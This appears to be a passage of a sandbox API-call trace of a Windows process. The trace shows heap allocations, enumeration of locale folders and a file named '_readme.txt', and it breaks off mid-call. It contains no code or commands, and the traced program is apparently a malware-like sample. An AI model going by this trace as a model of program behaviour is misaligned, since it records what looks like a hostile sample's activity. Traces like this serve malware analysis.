[0093.790] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330310 [0093.790] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330630 [0093.790] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330900 [0093.790] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330630 | out: hHeap=0x630000) returned 1 [0093.790] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330310 | out: hHeap=0x630000) returned 1 [0093.790] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pt-BR", cAlternateFileName="")) returned 1 [0093.790] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330310 [0093.790] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330630 [0093.790] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330860 [0093.790] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330630 | out: hHeap=0x630000) returned 1 [0093.790] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330310 | out: hHeap=0x630000) returned 1 [0093.790] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pt-PT", cAlternateFileName="")) returned 1 [0093.791] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330310 [0093.791] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330630 [0093.791] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302c0 [0093.791] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330630 | out: hHeap=0x630000) returned 1 [0093.791] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330310 | out: hHeap=0x630000) returned 1 [0093.791] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ru-RU", cAlternateFileName="")) returned 1 [0093.791] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330310 [0093.791] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330630 [0093.791] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330720 [0093.791] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330630 | out: hHeap=0x630000) returned 1 [0093.791] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330310 | out: hHeap=0x630000) returned 1 [0093.791] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sv-SE", cAlternateFileName="")) returned 1 [0093.791] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330310 [0093.791] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330630 [0093.791] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x310) returned 0x3340958 [0093.791] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330388 [0093.791] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fcf8 [0093.791] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33306d0 [0093.791] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fe38 [0093.791] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330428 [0093.791] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332feb0 [0093.792] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33304a0 [0093.792] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33306f8 [0093.792] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fe10 [0093.792] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330658 [0093.792] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33307e8 [0093.792] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332ff50 [0093.792] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330590 [0093.792] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fd70 [0093.792] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332ff78 [0093.792] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33304f0 [0093.792] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330838 [0093.792] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330298 [0093.792] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fd48 [0093.792] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fcd0 | out: hHeap=0x630000) returned 1 [0093.792] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33300e0 | out: hHeap=0x630000) returned 1 [0093.792] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330338 | out: hHeap=0x630000) returned 1 [0093.793] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332f8e8 | out: hHeap=0x630000) returned 1 [0093.793] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fdc0 | out: hHeap=0x630000) returned 1 [0093.793] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330798 | out: hHeap=0x630000) returned 1 [0093.793] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330540 | out: hHeap=0x630000) returned 1 [0093.793] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330270 | out: hHeap=0x630000) returned 1 [0093.793] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0093.793] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0093.793] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330478 | out: hHeap=0x630000) returned 1 [0093.793] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330608 | out: hHeap=0x630000) returned 1 [0093.793] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330018 | out: hHeap=0x630000) returned 1 [0093.793] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330158 | out: hHeap=0x630000) returned 1 [0093.793] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330770 | out: hHeap=0x630000) returned 1 [0093.793] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330900 | out: hHeap=0x630000) returned 1 [0093.793] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330860 | out: hHeap=0x630000) returned 1 [0093.794] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302c0 | out: hHeap=0x630000) returned 1 [0093.794] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330720 | out: hHeap=0x630000) returned 1 [0093.794] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0093.794] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330720 [0093.794] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330630 | out: hHeap=0x630000) returned 1 [0093.794] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330310 | out: hHeap=0x630000) returned 1 [0093.794] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="tr-TR", cAlternateFileName="")) returned 1 [0093.794] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330310 [0093.794] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330630 [0093.794] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302c0 [0093.794] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330630 | out: hHeap=0x630000) returned 1 [0093.794] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330310 | out: hHeap=0x630000) returned 1 [0093.794] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zh-CN", cAlternateFileName="")) returned 1 [0093.794] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330310 [0093.794] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330630 [0093.795] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330860 [0093.795] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330630 | out: hHeap=0x630000) returned 1 [0093.795] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330310 | out: hHeap=0x630000) returned 1 [0093.795] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zh-HK", cAlternateFileName="")) returned 1 [0093.795] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330310 [0093.795] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330630 [0093.795] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330900 [0093.795] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330630 | out: hHeap=0x630000) returned 1 [0093.795] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330310 | out: hHeap=0x630000) returned 1 [0093.795] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zh-TW", cAlternateFileName="")) returned 1 [0093.795] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330310 [0093.795] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330630 [0093.795] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330770 [0093.795] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330630 | out: hHeap=0x630000) returned 1 [0093.795] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330310 | out: hHeap=0x630000) returned 1 [0093.795] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa17023e0, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa17023e0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa1728540, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x453, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0093.795] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa17023e0, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa17023e0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa1728540, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x453, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0093.796] FindClose (in: hFindFile=0x670618 | out: hFindFile=0x670618) returned 1 [0093.796] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.796] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33307c0 | out: hHeap=0x630000) returned 1 [0093.796] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33307c0 [0093.796] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0093.796] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330310 [0093.796] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0093.796] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.796] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330310 | out: hHeap=0x630000) returned 1 [0093.796] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330310 [0093.796] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0093.796] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.796] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330310 | out: hHeap=0x630000) returned 1 [0093.796] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330310 [0093.796] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0093.796] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.796] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330310 | out: hHeap=0x630000) returned 1 [0093.796] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330310 [0093.796] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0093.796] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.796] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330310 | out: hHeap=0x630000) returned 1 [0093.796] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330310 [0093.796] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0093.796] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.796] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330310 | out: hHeap=0x630000) returned 1 [0093.797] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330310 [0093.797] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0093.797] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.797] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330310 | out: hHeap=0x630000) returned 1 [0093.797] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330310 [0093.797] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0093.797] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x32cf950 [0093.797] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.797] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cf950 | out: hHeap=0x630000) returned 1 [0093.797] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330310 | out: hHeap=0x630000) returned 1 [0093.797] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330310 [0093.797] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0093.797] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.797] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330310 | out: hHeap=0x630000) returned 1 [0093.797] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330310 [0093.797] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0093.797] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.797] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330310 | out: hHeap=0x630000) returned 1 [0093.797] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330310 [0093.797] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0093.797] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0093.797] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330310 | out: hHeap=0x630000) returned 1 [0093.797] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330310 [0093.797] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0093.797] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0093.797] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330310 | out: hHeap=0x630000) returned 1 [0093.797] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330310 [0093.797] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0093.797] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.797] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330310 | out: hHeap=0x630000) returned 1 [0093.797] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330310 [0093.797] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0093.798] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.798] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330310 | out: hHeap=0x630000) returned 1 [0093.798] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330310 [0093.798] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0093.798] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.798] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330310 | out: hHeap=0x630000) returned 1 [0093.798] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330310 [0093.798] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0093.798] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.798] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330310 | out: hHeap=0x630000) returned 1 [0093.798] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330310 [0093.798] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0093.798] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.798] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330310 | out: hHeap=0x630000) returned 1 [0093.798] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330310 [0093.798] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0093.798] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.798] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330310 | out: hHeap=0x630000) returned 1 [0093.798] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330310 [0093.798] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0093.798] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.798] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330310 | out: hHeap=0x630000) returned 1 [0093.798] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330310 [0093.798] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0093.798] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.798] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330310 | out: hHeap=0x630000) returned 1 [0093.798] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330310 [0093.798] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0093.798] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.798] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330310 | out: hHeap=0x630000) returned 1 [0093.798] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330310 [0093.798] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0093.798] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.798] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330310 | out: hHeap=0x630000) returned 1 [0093.799] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330310 [0093.799] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0093.799] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.799] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330310 | out: hHeap=0x630000) returned 1 [0093.799] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330310 [0093.799] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0093.799] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x32cf950 [0093.799] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.799] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cf950 | out: hHeap=0x630000) returned 1 [0093.799] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330310 | out: hHeap=0x630000) returned 1 [0093.799] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330310 [0093.799] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0093.799] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.799] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330310 | out: hHeap=0x630000) returned 1 [0093.799] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330310 [0093.799] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0093.799] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x32cf950 [0093.799] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0093.799] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cf950 | out: hHeap=0x630000) returned 1 [0093.799] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330310 | out: hHeap=0x630000) returned 1 [0093.799] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330310 [0093.799] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0093.799] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0093.799] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330310 | out: hHeap=0x630000) returned 1 [0093.799] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330310 [0093.799] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0093.799] HeapFree (in: hHeap=0x630000, dwFlags=0x0, 